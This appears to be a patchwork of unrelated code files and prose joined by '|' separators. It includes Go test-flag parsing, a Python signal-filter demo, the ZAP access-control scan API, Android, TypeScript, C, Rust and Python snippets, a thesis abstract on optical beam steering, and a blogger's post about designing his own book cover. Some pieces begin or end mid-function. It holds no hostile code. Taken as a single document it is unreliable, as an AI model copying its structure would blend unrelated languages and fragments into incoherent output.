vk := uint64(dbIdx)<<32 | (uint64(tbIdx) & (1<<32 - 1))
if _, ok = visits[vk]; ok {
continue
}
visits[vk] = struct{}{}
var db, tb string
if db, tb, ok = vt.Topology().Render(dbIdx, tbIdx); !ok {
continue
}
ret[db] = append(ret[db], tb)
}
return ret, nil
}
|
/*
Copyright 2019 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package e2e
import (
"fmt"
"strings"
"github.com/pkg/errors"
)
// GinkgoFlags defines a type for handling flag/values pairs to be passed to the ginkgo test runner
type GinkgoFlags map[string]string
// NewGinkgoFlags returns a new GinkgoFlags struct created by parsing the space-separated list of arguments
func NewGinkgoFlags(flagString string) (GinkgoFlags, error) {
ginkgoFlags, err := parseFlagsString(flagString)
if err != nil {
return nil, err
}
return ginkgoFlags, nil
}
// AddFocusRegex allows to add a new regex to pass to ginkgo with the --focus flag.
// If the flag is already set, the new regex is OR-ed onto the existing one.
func (g GinkgoFlags) AddFocusRegex(val string) {
g.mergeRegex("focus", val)
}
// AddSkipRegex allows to add a new regex to pass to ginkgo with the --skip flag.
// If the flag is already set, the new regex is OR-ed onto the existing one.
func (g GinkgoFlags) AddSkipRegex(val string) {
g.mergeRegex("skip", val)
}
func (g GinkgoFlags) mergeRegex(key, val string) {
if exp, ok := g[key]; !ok {
g[key] = val
} else {
g[key] = fmt.Sprintf("%s|%s", exp, val)
}
}
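// For example (hypothetical values), calling AddFocusRegex(`\[Slow\]`) and then
// AddFocusRegex(`\[Serial\]`) leaves g["focus"] equal to `\[Slow\]|\[Serial\]`.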
// SuiteFlags defines a type for handling flag/values pairs to be passed to the test suite
type SuiteFlags map[string]string
// NewSuiteFlags returns a new SuiteFlags struct created by parsing the space-separated list of arguments
func NewSuiteFlags(flagString string) (SuiteFlags, error) {
testFlags, err := parseFlagsString(flagString)
if err != nil {
return nil, err
}
return testFlags, nil
}
// parseFlagsString parse the space-separated list of arguments
func parseFlagsString(flagString string) (flags map[string]string, err error) {
flags = make(map[string]string)
if flagString == "" {
return
}
	// splits the space-separated list and parses each --key=value argument
for _, arg := range strings.Split(flagString, " ") {
key, val, err := parseFlagString(arg)
if err != nil {
return nil, errors.Errorf("flag %q could not be parsed correctly: %v", arg, err)
}
flags[key] = val
}
return flags, nil
}
// parseFlagString parses a --key=value argument from the space-separated list of arguments
func parseFlagString(arg string) (string, string, error) {
if !strings.HasPrefix(arg, "--") {
return "", "", errors.New("the argument should start with '--'")
}
if !strings.Contains(arg, "=") {
return "", "", errors.New("the argument should have a '=' between the flag name and the value")
}
// Remove the starting --
arg = strings.TrimPrefix(arg, "--")
// Split the string on =. Return only two substrings, since we want only key/value, but the value can include '=' as well
keyvalSlice := strings.SplitN(arg, "=", 2)
// Make sure both a key and value is present
if len(keyvalSlice) != 2 {
return "", "", errors.New("the argument must have both a key and a value")
}
if len(keyvalSlice[0]) == 0 {
return "", "", errors.New("the argument must have a key")
}
return keyvalSlice[0], keyvalSlice[1], nil
}
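// For example, parseFlagString(`--focus=\[Conformance\]`) returns
// ("focus", `\[Conformance\]`, nil), while parseFlagString("focus=x") returns an
// error because the argument does not start with "--".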
|
// TODO: 2018/1/4 reactive is not supported yet, omega context won't be updated on shared threads
@Test
public void passesOmegaContextThroughReactiveX() throws Exception {
Flowable.just(user)
.parallel()
.runOn(Schedulers.io())
.doOnNext(new Consumer() {
@Override
public void accept(Object user) throws Exception {
userService.add((User)user);
}
})
.sequential()
.subscribe();
waitTillSavedUser(username);
assertArrayEquals(
new String[] {
new TxStartedEvent(globalTxId, newLocalTxId, globalTxId, compensationMethod, 0, "", 0, 0, 0, 0, 0, user).toString(),
new TxEndedEvent(globalTxId, newLocalTxId, globalTxId, compensationMethod).toString()},
toArray(messages)
);
}
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from scipy import signal
import pycqed.measurement.kernel_functions_ZI as ZI_kern
mpl.rcParams['font.size'] = 12
mpl.rcParams['legend.fontsize'] = 12
mpl.rcParams['figure.titlesize'] = 'medium'
# Settings
fs = 2.4e9
time_start = -100e-9
time_start = np.around(time_start*fs)/fs
time_end = 100e-9
time = np.arange(time_start, time_end, 1/fs)
delay = 10.1e-9
amplitude = 0.1
# Construct impulse_response
impulse = np.zeros(len(time))
zero_ind = np.argmin(np.abs(time))
impulse[zero_ind] = 1.0
delay_ind = np.argmin(np.abs(time-delay))
impulse_response = np.copy(impulse)
impulse_response[delay_ind] = amplitude
# Derive step response
step = np.zeros(len(time))
step[time >= 0.0] = 1.0
step_response = signal.lfilter(impulse_response[zero_ind:], 1.0, step)
# Compute ideal inverted filter kernel
a = ZI_kern.ideal_inverted_fir_kernel(impulse_response, zero_ind)
a1 = ZI_kern.first_order_bounce_kern(delay, -amplitude, fs)
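# Background for the kernels above: the reflection model used here is
# h[n] = delta[n] + amplitude * delta[n - D] with D = round(delay * fs).
# Its exact inverse 1/(1 + a*z^-D) expands to sum_k (-a)^k * z^-(k*D); the
# first-order correction keeps only the k <= 1 terms, i.e. a kernel that is
# assumed here to equal [1, 0, ..., 0, -amplitude].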
# Apply ideal inverted filter to impulse response and step response
impulse_response_corr = signal.lfilter(a, 1.0, impulse_response)
step_response_corr = signal.lfilter(a, 1.0, step_response)
# Apply first-order inverted filter to impulse response and step response
impulse_response_corr1 = signal.lfilter(a1, 1.0, impulse_response)
step_response_corr1 = signal.lfilter(a1, 1.0, step_response)
# Apply hardware-friendly filter to impulse response and step response
impulse_response_corr_hw = ZI_kern.multipath_first_order_bounce_correction(impulse_response, round(delay*fs), amplitude)
step_response_corr_hw = ZI_kern.multipath_first_order_bounce_correction(step_response, round(delay*fs), amplitude)
# Plot impulse response comparison
plt.figure(1, figsize=(14,10))
plt.subplot(2, 2, 1)
plt.plot(time*1e9, impulse_response)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(a) Impulse response')
plt.subplot(2, 2, 2)
plt.plot(time*1e9, impulse_response_corr)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(b) Ideal corrected impulse response')
plt.subplot(2, 2, 3)
plt.plot(time*1e9, impulse_response_corr1)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(c) First-order corrected impulse response')
plt.subplot(2, 2, 4)
plt.plot(time*1e9, impulse_response_corr_hw)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(d) Simulated hardware-corrected impulse response')
plt.tight_layout()
plt.savefig('impulse_response.png',dpi=600,bbox_inches='tight')
plt.show()
# Plot step response comparison
plt.figure(2, figsize=(14,10))
plt.subplot(2, 2, 1)
plt.plot(time*1e9, step_response)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(a) Step response')
plt.subplot(2, 2, 2)
plt.plot(time*1e9, step_response_corr)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(b) Ideal corrected step response')
plt.subplot(2, 2, 3)
plt.plot(time*1e9, step_response_corr1)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(c) First-order corrected step response')
plt.subplot(2, 2, 4)
plt.plot(time*1e9, step_response_corr_hw)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(d) Simulated hardware-corrected step response')
plt.tight_layout()
plt.savefig('step_response.png',dpi=600,bbox_inches='tight')
plt.show()
# Sawtooth test waveform
sawtooth_period = 50e-9
ideal_waveform = np.remainder(2*time/sawtooth_period, 1)
distorted_waveform = signal.lfilter(impulse_response[zero_ind:], 1.0, ideal_waveform)
# Apply ideal inverted filter to the waveform
distorted_waveform_corr = signal.lfilter(a, 1.0, distorted_waveform)
# Apply first-order filter to the waveform
distorted_waveform_corr1 = signal.lfilter(a1, 1.0, distorted_waveform)
# Apply hardware-friendly filter to the waveform
distorted_waveform_corr_hw = ZI_kern.multipath_first_order_bounce_correction(distorted_waveform, round(delay*fs), amplitude)
# Compute errors with respect to the ideal waveform
err = ideal_waveform - distorted_waveform_corr
err1 = ideal_waveform - distorted_waveform_corr1
err_hw = ideal_waveform - distorted_waveform_corr_hw
# Plot the test waveform comparison
plt.figure(3, figsize=(14,14))
plt.subplot(4, 2, 1)
plt.plot(time*1e9, ideal_waveform)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(a) Ideal waveform')
plt.subplot(4, 2, 2)
plt.plot(time*1e9, distorted_waveform)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(b) Distorted waveform')
plt.subplot(4, 2, 3)
plt.plot(time*1e9, distorted_waveform_corr)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(c) Ideal corrected waveform')
plt.subplot(4, 2, 4)
plt.plot(time*1e9, err)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(d) Error of ideal correction')
plt.subplot(4, 2, 5)
plt.plot(time*1e9, distorted_waveform_corr1)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(e) First-order correction')
plt.subplot(4, 2, 6)
plt.plot(time*1e9, err1)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(f) Error of first-order correction')
plt.subplot(4, 2, 7)
plt.plot(time*1e9, distorted_waveform_corr_hw)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(g) Simulated hardware-friendly first-order corrected waveform')
plt.subplot(4, 2, 8)
plt.plot(time*1e9, err_hw)
plt.xlabel('Time, t (ns)')
plt.ylabel('Amplitude (a.u)')
plt.title('(h) Error of hardware-friendly correction')
plt.tight_layout()
plt.savefig('test_waveform.png', dpi=600, bbox_inches='tight')
plt.show()
|
/*
* Zed Attack Proxy (ZAP) and its related class files.
*
* ZAP is an HTTP/HTTPS proxy for assessing web application security.
*
* Copyright 2019 The ZAP Development Team
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.zaproxy.zap.extension.accessControl;
import java.io.File;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.ParserConfigurationException;
import net.sf.json.JSONObject;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.parosproxy.paros.Constant;
import org.parosproxy.paros.control.Control;
import org.parosproxy.paros.control.Control.Mode;
import org.parosproxy.paros.core.scanner.Alert;
import org.zaproxy.zap.extension.accessControl.AccessControlScannerThread.AccessControlScanStartOptions;
import org.zaproxy.zap.extension.api.ApiAction;
import org.zaproxy.zap.extension.api.ApiException;
import org.zaproxy.zap.extension.api.ApiImplementor;
import org.zaproxy.zap.extension.api.ApiResponse;
import org.zaproxy.zap.extension.api.ApiResponseElement;
import org.zaproxy.zap.extension.api.ApiView;
import org.zaproxy.zap.extension.users.ExtensionUserManagement;
import org.zaproxy.zap.users.User;
import org.zaproxy.zap.utils.ApiUtils;
public class AccessControlAPI extends ApiImplementor {
private static final String PREFIX = "accessControl";
private ExtensionAccessControl extension;
private static ExtensionUserManagement usersExtension;
private static final String ACTION_SCAN = "scan";
private static final String ACTION_WRITE_HTML_REPORT = "writeHTMLreport";
private static final String VIEW_GET_SCAN_PROGRESS = "getScanProgress";
private static final String VIEW_GET_SCAN_STATUS = "getScanStatus";
private static final String PARAM_CONTEXT_ID = "contextId";
private static final String PARAM_USER_ID = "userId";
private static final String PARAM_RAISE_ALERT = "raiseAlert";
private static final String PARAM_ALERT_RISK_LEVEL = "alertRiskLevel";
private static final String PARAM_UNAUTH_USER = "scanAsUnAuthUser";
private static final String PARAM_FILENAME = "fileName";
private static final Logger LOGGER = LogManager.getLogger(AccessControlAPI.class);
/** Provided only for API client generator usage. */
public AccessControlAPI() {
this(null);
}
public AccessControlAPI(ExtensionAccessControl extension) {
this.extension = extension;
this.addApiAction(
new ApiAction(
ACTION_SCAN,
new String[] {PARAM_CONTEXT_ID, PARAM_USER_ID},
new String[] {
PARAM_UNAUTH_USER, PARAM_RAISE_ALERT, PARAM_ALERT_RISK_LEVEL
}));
this.addApiAction(
new ApiAction(
ACTION_WRITE_HTML_REPORT, new String[] {PARAM_CONTEXT_ID, PARAM_FILENAME}));
this.addApiView(new ApiView(VIEW_GET_SCAN_PROGRESS, new String[] {PARAM_CONTEXT_ID}));
this.addApiView(new ApiView(VIEW_GET_SCAN_STATUS, new String[] {PARAM_CONTEXT_ID}));
}
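    // For reference (assuming ZAP's standard API URL routing, which is not
    // shown in this file), these registrations expose endpoints such as:
    //   /JSON/accessControl/action/scan/?contextId=..&userId=..
    //   /JSON/accessControl/view/getScanStatus/?contextId=..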
@Override
public String getPrefix() {
return PREFIX;
}
@Override
public ApiResponse handleApiAction(String name, JSONObject params) throws ApiException {
ApiResponse result = null;
switch (name) {
case ACTION_SCAN:
LOGGER.debug("Access control start scan called");
AccessControlScanStartOptions startOptions = new AccessControlScanStartOptions();
startOptions.setTargetContext(
ApiUtils.getContextByParamId(params, PARAM_CONTEXT_ID));
Mode mode = Control.getSingleton().getMode();
if (Mode.safe.equals(mode)) {
throw new ApiException(
ApiException.Type.MODE_VIOLATION,
Constant.messages.getString(
"accessControl.scanOptions.error.mode.safe"));
} else if (Mode.protect.equals(mode)
&& !startOptions.getTargetContext().isInScope()) {
throw new ApiException(
ApiException.Type.MODE_VIOLATION,
Constant.messages.getString(
"accessControl.scanOptions.error.mode.protected",
startOptions.getTargetContext().getName()));
}
if (usersExtension == null) {
usersExtension =
Control.getSingleton()
.getExtensionLoader()
.getExtension(ExtensionUserManagement.class);
}
List<User> users = new ArrayList<>();
String[] commaSeparatedUserIDs =
ApiUtils.getNonEmptyStringParam(params, PARAM_USER_ID).split("\\s*,\\s*");
for (int i = 0; i < commaSeparatedUserIDs.length; i++) {
int userID;
try {
userID = Integer.parseInt(commaSeparatedUserIDs[i]);
} catch (NumberFormatException nfe) {
throw new ApiException(
ApiException.Type.ILLEGAL_PARAMETER,
"Failed to parse userID (int).",
nfe);
}
User userToAdd =
usersExtension
.getContextUserAuthManager(
startOptions.getTargetContext().getId())
.getUserById(userID);
if (userToAdd != null) {
users.add(userToAdd);
} else {
throw new ApiException(
ApiException.Type.USER_NOT_FOUND,
"No user found for userID: " + userID);
}
}
startOptions.setTargetUsers(users);
// Add unauthenticated user
if (params.optBoolean(PARAM_UNAUTH_USER, false)) {
startOptions.getTargetUsers().add(null);
}
startOptions.setRaiseAlerts(params.optBoolean(PARAM_RAISE_ALERT, true));
startOptions.setAlertRiskLevel(
params.optInt(PARAM_ALERT_RISK_LEVEL, Alert.RISK_HIGH));
if (!(startOptions.getAlertRiskLevel() >= Alert.RISK_INFO
&& startOptions.getAlertRiskLevel() <= Alert.RISK_HIGH)) {
throw new ApiException(
ApiException.Type.ILLEGAL_PARAMETER,
"The parsed Alert Risk Level was outside the range: "
+ Alert.RISK_INFO
+ " to "
+ Alert.RISK_HIGH);
}
extension.startScan(startOptions);
result = ApiResponseElement.OK;
break;
case ACTION_WRITE_HTML_REPORT:
LOGGER.debug("Write HTML report called");
File reportFile = new File(params.getString(PARAM_FILENAME));
try {
extension.generateAccessControlReport(
ApiUtils.getIntParam(params, PARAM_CONTEXT_ID), reportFile);
result = new ApiResponseElement(name, "OK");
} catch (ParserConfigurationException pce) {
                    String pceMessage = "Failed to generate access control report";
LOGGER.error(pceMessage, pce);
throw new ApiException(ApiException.Type.INTERNAL_ERROR, pceMessage, pce);
}
// Have to add the check because ReportGenerator.XMLToHtml() won't raise an
// exception
if (!reportFile.exists() || !reportFile.canWrite()) {
String writeFailedMessage =
"Error writing report to file " + reportFile.getPath();
LOGGER.error(writeFailedMessage);
throw new ApiException(ApiException.Type.INTERNAL_ERROR, writeFailedMessage);
}
break;
default:
throw new ApiException(ApiException.Type.BAD_ACTION);
}
return result;
}
@Override
public ApiResponse handleApiView(String name, JSONObject params) throws ApiException {
ApiResponse result;
int contextId;
switch (name) {
case VIEW_GET_SCAN_PROGRESS:
LOGGER.debug("Access control get scan progress called");
contextId = ApiUtils.getContextByParamId(params, PARAM_CONTEXT_ID).getId();
String scanStatus;
try {
scanStatus = String.valueOf(extension.getScanProgress(contextId));
} catch (IllegalStateException ise) {
                    throw new ApiException(
                            ApiException.Type.DOES_NOT_EXIST,
                            "Failed to obtain scan progress for contextId: " + contextId,
                            ise);
}
result = new ApiResponseElement(name, scanStatus);
break;
case VIEW_GET_SCAN_STATUS:
LOGGER.debug("Access control get scan status called");
contextId = ApiUtils.getContextByParamId(params, PARAM_CONTEXT_ID).getId();
result = new ApiResponseElement(name, extension.getScanStatus(contextId));
break;
default:
throw new ApiException(ApiException.Type.BAD_VIEW);
}
return result;
}
}
|
// Called once the elevation request completes.
@Override
protected void onPostExecute(Elevation elevation) {
super.onPostExecute(elevation);
googleElevation = elevation;
String alt = String.format("%.2f m", elevation.getAltitude());
currentGoogleAltitudeText.setText(alt);
LatLng point = new LatLng(lat, lon);
mMap.addMarker(new MarkerOptions().position(point).title(String.format("Google Altitude= %.2f m", googleElevation.getAltitude())));
mMap.moveCamera(CameraUpdateFactory.newLatLngZoom(point, 18.5f));
Log.e("google received", "google received");
isGoogleUpdated = true;
} |
'use strict';
import {inject, View, DetailAPI} from '../../../index';
import {ITaskData} from 'teambition';
@inject([
'DetailAPI',
'$filter'
])
export class EditRecurrenceView extends View {
public detail: any;
    public recurrence = [
        {
            name: '从不', // 'Never'
            recurrence: null,
            isSelected: false
        },
        {
            name: '每天', // 'Daily'
            recurrence: 'RRULE:FREQ=DAILY;INTERVAL=1',
            isSelected: false
        },
        {
            name: '每周', // 'Weekly'
            recurrence: 'RRULE:FREQ=WEEKLY;INTERVAL=1',
            isSelected: false
        },
        {
            name: '每两周', // 'Every two weeks'
            recurrence: 'RRULE:FREQ=WEEKLY;INTERVAL=2',
            isSelected: false
        },
        {
            name: '每月', // 'Monthly'
            recurrence: 'RRULE:FREQ=MONTHLY;INTERVAL=1',
            isSelected: false
        }
    ];
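    // The RRULE strings above follow RFC 5545 recurrence syntax, e.g.
    // 'RRULE:FREQ=WEEKLY;INTERVAL=2' means "repeat every second week".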
private DetailAPI: DetailAPI;
private boundToObjectId: string;
private boundToObjectType: string;
private lastIndex: number;
private $filter: any;
public onInit() {
this.boundToObjectId = this.$state.params._id;
this.boundToObjectType = this.$state.params.type;
return this.DetailAPI.fetch(this.boundToObjectId, this.boundToObjectType)
.then((task: ITaskData) => {
this.detail = task;
if (!this.detail.recurrence) {
this.recurrence[0].isSelected = true;
this.lastIndex = 0;
      } else {
for (let index = 1; index < this.recurrence.length; index++) {
let element = this.recurrence[index];
let parsedRecurrence = this.$filter('recurrenceStr')(this.detail.recurrenceTime);
if (element.name === parsedRecurrence) {
element.isSelected = true;
this.lastIndex = index;
}
}
}
});
}
public chooseRecurrence($index: number) {
this.showLoading();
return this.DetailAPI.update(this.boundToObjectId, this.boundToObjectType, {
recurrence: [this.recurrence[$index].recurrence]
})
.then(() => {
this.recurrence[this.lastIndex].isSelected = false;
this.recurrence[$index].isSelected = true;
this.lastIndex = $index;
      this.showMsg('success', '更新成功', '已更新任务重复规则'); // 'Update succeeded' / 'Task recurrence rule updated'
this.hideLoading();
window.history.back();
})
.catch((reason: any) => {
let message = this.getFailureReason(reason);
      this.showMsg('error', '更新失败', message); // 'Update failed'
this.hideLoading();
window.history.back();
});
}
}
angular.module('teambition').controller('EditRecurrenceView', EditRecurrenceView);
|
Free-Space Optical Beam Steering for Wireless Communications
The implementation of optical wireless communications (OWC) requires the use of a light-emitting diode (LED) or laser diode (LD). Due to the significant path loss exhibited by these sources in an outdoor environment, an unobstructed point-to-point link must be maintained in order to increase the signal-to-noise ratio (SNR) at the receiver. This thesis considers a solution to alleviate the fundamental limitations of the OWC channel in an outdoor environment
by investigating optical beam steering (OBS) to increase the signal strength in the desired direction. Conventional methods to implement OBS use a microelectromechanical systems (MEMS) mirror or a spatial light modulator (SLM), both of which suffer from low switching frequency. A high-frequency OBS device can be created by using an optical phased array (OPA). An electro-optic modulator (EOM) such as LiNbO3 can be used to create an OPA but cannot be directly integrated in silicon. For monolithic silicon-on-insulator (SOI) solutions, previous literature uses thermo-optic couplers on SOI to implement the OPA; however, this introduces the issue of thermal cross-talk. Therefore, this thesis focuses on the use of silicon as the EOM in an OPA to create a high-frequency monolithic OBS.
Our contributions consist of providing a design method for an OBS SOI device which exhibits minimal internal cross-talk and provides propagation in free space with high directivity and a wide steering range. Additionally, we propose the use of an internal heterodyne optical phase-locked loop (PLL) to stabilize the OBS instead of an external signal processor for phase correction. This optical PLL reduces beam jitter, minimizes beam squint, and provides active tracking of the output beam towards the receiver. We have also characterized a shadowing scenario in an OWC channel which OBS has the potential to alleviate. Moreover, we simulated the optical far-field radiation pattern from an SOI waveguide to free space, which has not been demonstrated in previous research. Finally, our simulation results for an SOI OPA demonstrate the coherent combining capability of OBS using MEEP and the Optiwave suite. |
/********************************************************************/
/* Below are the functions required by the PAPI component interface */
/********************************************************************/
static int
_sde_init_component( int cidx )
{
SUBDBG("_sde_init_component...\n");
_sde_vector.cmp_info.num_native_events = 0;
_sde_vector.cmp_info.CmpIdx = cidx;
#if defined(DEBUG)
_sde_debug = _papi_hwi_debug&DEBUG_SUBSTRATE;
#endif
return PAPI_OK;
} |
/**
* @author jluo
* @date: 14 Jun 2019
*/
@TestConfiguration
public class DataStoreTestConfig {
@Bean
@Profile("offline")
public HttpClient httpClient() {
return Mockito.mock(HttpClient.class);
}
    @Bean
@Profile("offline")
public SolrClient solrClient() {
return Mockito.mock(SolrClient.class);
}
@Bean
@Profile("offline")
public SolrRequestConverter requestConverter() {
return new SolrRequestConverter() {
@Override
public JsonQueryRequest toJsonQueryRequest(SolrRequest request) {
JsonQueryRequest solrQuery = super.toJsonQueryRequest(request);
// required for tests, because EmbeddedSolrServer is not sharded
((ModifiableSolrParams) solrQuery.getParams()).set("distrib", "false");
((ModifiableSolrParams) solrQuery.getParams()).set("terms.mincount", "1");
return solrQuery;
}
};
}
}
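// A minimal usage sketch (hypothetical test class): with the "offline"
// profile active, importing this configuration swaps in the mocks above.
//
//   @ActiveProfiles("offline")
//   @Import(DataStoreTestConfig.class)
//   class SomeRepositoryTest { ... }
|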
// SetValue writes the user's current provider client to the cache.
func (cache *Cache) SetValue(cacheKey string, cacheValue *CacheItem) error {
err := cache.all()
if err != nil {
return err
}
if cacheValue == nil {
delete(cache.items, cacheKey)
} else {
cache.items[cacheKey] = *cacheValue
}
filename, err := cacheFile()
if err != nil {
return err
}
cache.Lock()
defer cache.Unlock()
	data, err := json.Marshal(cache.items)
	if err != nil {
		return fmt.Errorf("error marshaling cache items: %s", err)
	}
	err = ioutil.WriteFile(filename, data, 0644)
	if err != nil {
		return fmt.Errorf("error setting cache value: %s", err)
}
return nil
} |
def handle_listing(self, listing, resource_class):
listing_object = extract_listing_data(listing)
    existing_listing_object = models.Listing.objects.filter(
        system_id=listing_object.system_id).first()
    if existing_listing_object:
existing_listing_update_date = existing_listing_object.update_date
new_listing_update_date = listing_object.update_date
aware_existing_listing_update_date = existing_listing_update_date.replace(
tzinfo=pytz.UTC)
aware_new_listing_update_date = new_listing_update_date.replace(
tzinfo=pytz.UTC)
if aware_new_listing_update_date > aware_existing_listing_update_date:
updated_listing_object = update_core_listing_data(
existing_listing_object, listing_object)
updated_listing_object.save()
else:
try:
try:
listing_object.save()
new_objects_cache.append(listing_object)
except (IntegrityError, DataError, PG_DataError):
logger.debug(
'Received error when inserting new Listing object:')
logger.debug(traceback.print_exc(limit=None))
raise ListingException()
feature_objects = extract_feature_data(listing,
resource_class)
for feature_object in feature_objects:
listing_object.features.add(feature_object)
listing_object.save()
remark_object = extract_remark_data(listing)
remark_object.save()
listing_object.remark = remark_object
listing_object.save()
agent_object = extract_agent_data(listing)
if agent_object.agent_id:
agent_object_final, created = models.Agent.objects.get_or_create(
agent_id=agent_object.agent_id)
listing_object.agent_set.add(agent_object_final)
listing_object.save()
office_object = extract_office_data(listing)
if office_object.office_id:
office_object_final, created = models.Office.objects.get_or_create(
office_id=office_object.office_id)
listing_object.office_set.add(office_object_final)
listing_object.save()
tax_info_object = extract_tax_info_data(listing)
tax_info_object.listing = listing_object
tax_info_object.save()
virtual_tour_object = extract_virtual_tour_data(
listing)
virtual_tour_object.listing = listing_object
virtual_tour_object.save()
latitude, longitude = get_geocoordinates(
self.geolocator, listing_object)
listing_object.latitude = latitude
listing_object.longitude = longitude
listing_image_responses = fetch_listing_images(self.client, listing)
for part in listing_image_responses:
image_url = get_listing_image(part)
if len(image_url):
image_object = models.Photo(listing=listing_object,
url=get_listing_image(part))
image_object.save()
listing_object.save()
new_objects_cache.remove(listing_object)
            new_objects_count = globals().get('new_objects_count')
            globals().update({'new_objects_count': new_objects_count + 1})
except (ValueError, DataError, PG_DataError):
logger.debug(traceback.print_exc(limit=None))
try:
new_objects_cache.remove(listing_object)
except ValueError:
pass
raise ListingException() |
def drift(df: pd.DataFrame) -> np.ndarray:
t = df.groupby('profile')['time'].first().astype('int64') // 1e9
dt = np.diff(t)
x = df.groupby('profile')['lon'].first() * np.pi / 180
y = df.groupby('profile')['lat'].first() * np.pi / 180
ds = haversine_distance(x.values, y.values)
ds_dt = np.zeros_like(t)
for i in range(ds.shape[0]):
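        # guard the 0/0 case (profile repeated in both position and time)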
if np.abs(ds[i]) < 0.0001 and np.abs(dt[i]) < 0.0001:
ds_dt[i] = 0
else:
ds_dt[i] = ds[i] / dt[i]
    return ds_dt
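# A minimal sketch of the helper assumed above (hypothetical; not from the
# source): consecutive great-circle distances in meters between points given
# in radians, matching the len(x) - 1 length that `drift` expects for ds.
def haversine_distance(x: np.ndarray, y: np.ndarray, r: float = 6371000.0) -> np.ndarray:
    dlon = np.diff(x)
    dlat = np.diff(y)
    h = np.sin(dlat / 2) ** 2 + np.cos(y[:-1]) * np.cos(y[1:]) * np.sin(dlon / 2) ** 2
    return 2 * r * np.arcsin(np.sqrt(h))
|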
import unittest
from cli import cli
import os
from translator import utils
class TestCli(unittest.TestCase):
os.chdir(utils.get_project_root_path())
def test_cli(self):
cli.main(['--template-file', 'examples/small_nfv_example.yaml', '--validate-only'])
def test_cli_change_wd(self):
os.chdir('examples')
try:
cli.main(['--template-file', 'small_nfv_example.yaml', '--validate-only'])
finally:
os.chdir(utils.get_project_root_path())
if __name__ == '__main__':
unittest.main()
|
//! Errors that can occur while using the capability endpoints.
pub(super) use diesel::result::Error as Diesel;
/// Represents possible errors from using the database for capabilities.
pub enum Error {
/// Database errors of many kinds.
DB(Diesel),
/// Insufficient capabilities for accessing an endpoint for capabilities.
Unauthorized,
}
impl From<Diesel> for Error {
fn from(e: Diesel) -> Self {
Self::DB(e)
}
}
impl From<Error> for rocket::http::Status {
fn from(e: Error) -> Self {
match e {
Error::DB(_) => Self::InternalServerError,
Error::Unauthorized => Self::Unauthorized,
}
}
}
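// A minimal usage sketch (hypothetical handler, not part of this module): the
// `From<Diesel>` impl lets `?` lift database errors into `Error`, and the
// `From<Error> for Status` impl converts failures into HTTP statuses.
//
//     fn find_capability(conn: &diesel::PgConnection) -> Result<(), Error> {
//         // diesel queries return Result<_, diesel::result::Error>, so `?`
//         // converts automatically through From<Diesel>.
//         Ok(())
//     }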
|
Howdy, all! Just coming off a great weekend, great for sales (orbiting in and out of the Top 500 Kindles on Amazon), garnering great reviews (and one who was NOT a fan (sorry, dude)), and gathering some truly great numbers here on the blog (my highest number of hits EVAR). I really should hold contests and make dictates about sci-fi-coolness more often.
And now I’m about to sit down to an Irish/New England Boiled Dinner, with corned beef, kielbasa, linguica, potatoes, onions, cabbage, carrots, and my third Guinness of the night. St. Paddy’s Day tis a wonderful thing!
Being that things are rosy in writerly circles, I decided to doff my writer’s hat (it’s a dunce cap) and try on a couple of my other hats in order to challenge myself. I left the Real Job’s hat in the closet, because who wants to think about the real world on a day like today. Instead, I whipped out my artiste’s beret, and decided to focus on myself as a visual arts fella’.
As those of you who follow know, I did my own art for the book, and from that art, I created my own cover. Now, I think I did a good job, and I don’t believe the amateur nature of my cover has done my sales any harm. But, not all books can say that, and it is generally advised that any writer who hires himself to do the cover art for his own book has a fool for a client (that saying may have originated elsewhere, I don’t recall). To determine whether or not the aphorism applied to me, I decided to put myself even further out there. First, I offered up my cover to the new site CoverCritics.com for the inaugural week. Nathan Shumate also runs LousyBookCovers.com, but this new site is all about CONSTRUCTIVE criticism rather than schadenfreude. I encourage all of you aspiring cover artist/writers to check out BOTH sites before you attempt to do it yourself. As for how I did, the consensus seems to be that the art is good, it sells the book and clearly lays out the genre, but my title fonts don’t really fit the SF tone, and I tried to be too clever by putting in a metallic texture. I can’t fault the criticism, and when I eventually do put up a revised edition, I’ll see about applying them. Another guy criticized my lens flare, but if it’s good enough for J. J. Abrams, it’s good enough for me!
